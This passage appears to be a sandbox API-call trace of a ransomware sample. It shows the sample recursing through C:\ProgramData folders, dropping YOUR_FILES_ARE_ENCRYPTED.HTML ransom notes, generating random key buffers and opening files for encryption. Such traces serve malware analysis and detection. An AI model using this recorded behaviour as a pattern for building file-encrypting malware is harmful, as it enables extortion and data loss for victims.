ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x8958e880, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x15dbe, dwReserved0=0x0, dwReserved1=0x60, cFileName="WelcomeFax.tif", cAlternateFileName="")) returned 0 [0157.461] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.461] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 94 [0157.461] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.462] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.468] CloseHandle (hObject=0x4a8) returned 1 [0157.469] GetProcessHeap () returned 0x270000 [0157.470] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.470] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x946e16dc, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 0 [0157.470] FindClose (in: hFindFile=0x42f31c0 | out: 
hFindFile=0x42f31c0) returned 1 [0157.470] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 88 [0157.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\virtualinbox\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.471] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.474] CloseHandle (hObject=0x5a0) returned 1 [0157.475] GetProcessHeap () returned 0x270000 [0157.476] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.476] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 0 [0157.476] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.476] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0157.476] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows 
NT\\MSFax\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msfax\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.477] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.479] CloseHandle (hObject=0x598) returned 1 [0157.480] GetProcessHeap () returned 0x270000 [0157.481] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.481] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSScan", cAlternateFileName="")) returned 1 [0157.481] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned 46 [0157.481] GetProcessHeap () returned 0x270000 [0157.481] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.481] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan" [0157.481] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*") 
returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*" [0157.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.482] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.482] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4375095c, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x4375095c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x4375095c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x0, dwReserved1=0x60, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 1 [0157.482] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg") returned 62 [0157.482] lstrcmpW (lpString1="WelcomeScan.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.482] PathFindExtensionW 
(pszPath="WelcomeScan.jpg") returned=".jpg" [0157.482] lstrlenW (lpString=".jpg") returned 4 [0157.482] PathFindExtensionW (pszPath="WelcomeScan.jpg") returned=".jpg" [0157.482] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.482] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0157.483] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4375095c, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x4375095c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x4375095c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0x0, dwReserved1=0x60, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 0 [0157.483] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.483] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0157.483] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\msscan\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.483] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.486] CloseHandle (hObject=0x598) returned 1 [0157.486] GetProcessHeap () returned 0x270000 [0157.487] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.488] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe5119f42, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSScan", cAlternateFileName="")) returned 0 [0157.488] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.488] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0157.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows nt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.488] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.491] CloseHandle (hObject=0x58c) returned 1 [0157.491] GetProcessHeap () returned 0x270000 [0157.492] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.498] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, 
ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0157.498] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned 36 [0157.498] GetProcessHeap () returned 0x270000 [0157.498] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.501] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc" [0157.501] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*" [0157.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.501] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, 
ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.502] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Profiles", cAlternateFileName="")) returned 1 [0157.502] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned 45 [0157.502] GetProcessHeap () returned 0x270000 [0157.502] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.503] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles" [0157.503] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*" [0157.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.503] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.504] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.504] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.504] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0157.504] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\Profiles\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\wwansvc\\profiles\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0157.504] GetProcessHeap () returned 0x270000 [0157.505] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.505] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | 
out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Profiles", cAlternateFileName="")) returned 0 [0157.505] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.506] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0157.506] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\wwansvc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.506] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.509] CloseHandle (hObject=0x58c) returned 1 [0157.509] GetProcessHeap () returned 0x270000 [0157.511] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.512] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="WwanSvc", 
cAlternateFileName="")) returned 0 [0157.512] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0157.512] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 58 [0157.512] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0157.513] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0157.515] CloseHandle (hObject=0x4a4) returned 1 [0157.516] GetProcessHeap () returned 0x270000 [0157.517] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0157.517] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0157.518] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft OneDrive") returned 37 [0157.518] GetProcessHeap () returned 0x270000 [0157.518] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0157.518] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Microsoft 
OneDrive" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive" [0157.518] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*" [0157.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft OneDrive\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0157.519] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.519] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa376ca70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="setup", cAlternateFileName="")) returned 1 [0157.519] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, 
